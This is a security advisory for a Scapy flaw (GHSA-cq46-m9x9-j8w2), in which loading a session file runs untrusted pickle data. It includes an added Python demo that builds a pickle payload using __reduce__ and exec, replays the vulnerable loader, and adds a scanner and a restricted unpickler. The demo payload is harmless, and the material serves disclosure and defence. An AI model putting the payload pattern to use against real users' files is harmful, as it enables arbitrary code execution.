GHSA-cq46-m9x9-j8w2

Source
https://github.com/advisories/GHSA-cq46-m9x9-j8w2
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-cq46-m9x9-j8w2/GHSA-cq46-m9x9-j8w2.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-cq46-m9x9-j8w2
Published
2025-10-22T16:45:49Z
Modified
2025-10-23T20:17:37.620579Z
Severity
  • 5.4 (Medium) CVSS_V4 - CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Summary
Scapy Session Loading Vulnerable to Arbitrary Code Execution via Untrusted Pickle Deserialization
Details

Summary

An unsafe deserialization vulnerability in Scapy before v2.7.0 allows an attacker to execute arbitrary code when a user loads a malicious session file locally with the -s option. Exploitation requires convincing a user to load the attacker's session file; the payload then runs with that user's privileges.


Details

Scapy’s interactive shell supports session loading using gzip-compressed pickle files:

./run_scapy -s <session_file.pkl.gz>

Internally, this triggers:

# main.py
SESSION = pickle.load(gzip.open(session_name, "rb"))

Since nothing validates or restricts what the pickle stream may reference, a payload embedded via __reduce__() runs as soon as the file is loaded, before the user sees a prompt. An attacker therefore only needs to place a crafted .pkl.gz where a user will load it, for example in a shared folder.

The vulnerability exists in the load_session function, which deserializes data using pickle.load() on .pkl.gz files provided via the -s CLI flag or programmatically through conf.session. When gzip decoding fails, the same function falls back to pickle.load() on the raw file, so an uncompressed pickle is loaded just as readily as a compressed one.

Affected lines in source code: https://github.com/secdev/scapy/blob/master/scapy/main.py#L569-L572

# Excerpt from load_session() in scapy/main.py (Scapy <= 2.6.1)
try:
    s = pickle.load(gzip.open(fname, "rb"))   # gzip-compressed pickle, unrestricted load
except IOError:
    try:
        s = pickle.load(open(fname, "rb"))    # fallback: plain pickle, equally unrestricted
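The mechanism above, worked end to end as an added example (illustrative code written for this page, not Scapy's own): a session file whose pickle stream references builtins.exec through __reduce__(), the load pattern of load_session() reproduced on a temporary file including the uncompressed-pickle fallback, a pickletools opcode scan that names what the stream would import without executing it, and a restricted Unpickler that refuses the import. The environment variable name SCAPY_PICKLE_DEMO and all function names are assumptions made for the demo; the payload only sets that variable so the effect is observable but harmless.

```python
"""Added demo for GHSA-cq46-m9x9-j8w2: illustrative code, not Scapy's.
(1) a session.pkl.gz whose __reduce__ payload runs on pickle.load,
(2) the load pattern of load_session() in Scapy <= 2.6.1 (gzip, then raw file),
(3) a static pickletools scan of what the stream would import and call,
(4) an allowlisting Unpickler that refuses the stream before anything runs."""
import gzip
import os
import pickle
import pickletools
import tempfile

MARKER_ENV = "SCAPY_PICKLE_DEMO"  # assumed name; the harmless side effect the payload produces


class MaliciousSession:
    """Attacker-controlled object: __reduce__ makes the unpickler call builtins.exec
    on attacker source. A real payload would use os.system/subprocess; this one
    only sets an environment variable in the loading process."""

    def __reduce__(self):
        return (exec, ("import os; os.environ[%r] = 'executed'" % MARKER_ENV,))


def write_malicious_session(path):
    """Constructed attacker artifact: the .pkl.gz a victim would pass to -s."""
    with gzip.open(path, "wb") as fh:
        pickle.dump(MaliciousSession(), fh)


def vulnerable_load_session(fname):
    """Same shape as load_session() before 2.7.0: unrestricted pickle.load on the
    gzip stream, then on the raw file if gzip decoding fails (gzip.BadGzipFile
    is an OSError, which is what IOError now means)."""
    try:
        with gzip.open(fname, "rb") as fh:
            return pickle.load(fh)
    except OSError:
        with open(fname, "rb") as fh:
            return pickle.load(fh)


STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE",
              "STRING", "SHORT_BINSTRING", "BINSTRING"}
CALL_OPS = {"REDUCE", "NEWOBJ", "NEWOBJ_EX", "INST", "OBJ"}


def scan_pickle(data):
    """Walk the opcode stream without executing it; return (names the pickle would
    import, opcodes that would call them). Triage only: a legitimate Scapy session
    also imports packet classes, so a hit means 'inspect', not 'malicious'.
    STACK_GLOBAL takes module and attribute from the two most recent strings on the
    stack; this tracker ignores memo lookups, which suffices for straight-line streams."""
    imported, calls, strings = [], [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in STRING_OPS:
            strings.append(arg)
        elif op.name == "GLOBAL":          # protocol <= 3: arg is "module name"
            imported.append(arg.replace(" ", "."))
        elif op.name == "STACK_GLOBAL":    # protocol 4+: module and name pushed as strings
            imported.append("%s.%s" % tuple(strings[-2:]))
        elif op.name in CALL_OPS:
            calls.append(op.name)
    return imported, calls


class RestrictedUnpickler(pickle.Unpickler):
    """Hardened loader: find_class() resolves only allowlisted globals, so a stream
    referencing builtins.exec, os.system, subprocess.Popen, ... fails before any
    callable is invoked. Allowlisted classes must themselves be safe to construct
    and to __setstate__; a real Scapy session would need every packet class listed."""

    ALLOWED = {("builtins", "set"), ("builtins", "frozenset"), ("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError("session file references %s.%s; refusing" % (module, name))


def restricted_load_session(fname):
    with gzip.open(fname, "rb") as fh:
        return RestrictedUnpickler(fh).load()


def run_demo():
    """Build the file in a temp dir and record what each loader does."""
    os.environ.pop(MARKER_ENV, None)
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "session.pkl.gz")
        write_malicious_session(path)
        with gzip.open(path, "rb") as fh:
            results["imported"], results["calls"] = scan_pickle(fh.read())
        try:
            restricted_load_session(path)
            results["restricted_refused"] = False
        except pickle.UnpicklingError:
            results["restricted_refused"] = True
        results["marker_before"] = os.environ.get(MARKER_ENV)
        vulnerable_load_session(path)            # the -s code path: payload runs here
        results["marker_after"] = os.environ.get(MARKER_ENV)
        # The fallback branch means an uncompressed pickle is loaded just the same.
        os.environ.pop(MARKER_ENV, None)
        plain = os.path.join(tmp, "session.pkl")
        with open(plain, "wb") as fh:
            pickle.dump(MaliciousSession(), fh)
        vulnerable_load_session(plain)
        results["plain_pickle_ran"] = os.environ.get(MARKER_ENV) == "executed"
    return results


if __name__ == "__main__":
    for key, value in run_demo().items():
        print("%-18s %s" % (key, value))
```

Running the module shows the scan reporting builtins.exec and a REDUCE opcode before anything executes, the restricted loader raising UnpicklingError, and the vulnerable loader setting the marker for both the gzip and the plain file. The scan and the allowlist are the two checks worth keeping if you must consume pickles at all; neither makes pickle a safe format for untrusted input, which is why not loading sessions at all is the mitigation the advisory gives.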

Impact

This is a classic insecure deserialization vulnerability: untrusted data is handed to pickle.load(), which leads directly to arbitrary code execution.

Anyone who can trick a user into loading a crafted session file (for example via the -s option, or a file referenced by conf.session) can execute arbitrary Python code as that user.

  • Vulnerability type: Insecure deserialization (Python pickle)
  • CWE: CWE-502: Deserialization of Untrusted Data
  • CVSS v4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
  • CVSS Score: 5.4 (Medium)
  • Impact: Arbitrary Code Execution
  • Attack vector: Local or supply chain (malicious .pkl.gz)
  • Affected users: Any user who loads session files (even interactively)
  • Affected versions: Scapy <= v2.6.1 (2.6.1 is the last affected release)

Mitigations

  • Do not use sessions (the -s option when launching Scapy, or conf.session).
  • Use Scapy 2.7.0 or later, where the session mechanism has been removed.
Database specific
{
    "github_reviewed": true,
    "nvd_published_at": null,
    "cwe_ids": [
        "CWE-502"
    ],
    "github_reviewed_at": "2025-10-22T16:45:49Z",
    "severity": "MODERATE"
}
References

Affected packages

PyPI / scapy

Affected ranges (type: ECOSYSTEM)
  Introduced: 0 (unknown introduced version; all previous versions are affected)
  Last affected: 2.6.1

Affected versions

2.*
2.2.0-dev
2.3.1
2.3.2
2.3.3
2.4rc2
2.4.0rc3
2.4.0rc4
2.4.0rc5
2.4.0
2.4.1
2.4.2
2.4.3rc1
2.4.3rc2
2.4.3rc3
2.4.3rc4
2.4.3
2.4.4rc1
2.4.4rc2
2.4.4
2.4.5rc1
2.4.5
2.5.0rc1
2.5.0rc2
2.5.0rc3
2.5.0
2.6.0rc1
2.6.0rc2
2.6.0
2.6.1

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-cq46-m9x9-j8w2/GHSA-cq46-m9x9-j8w2.json"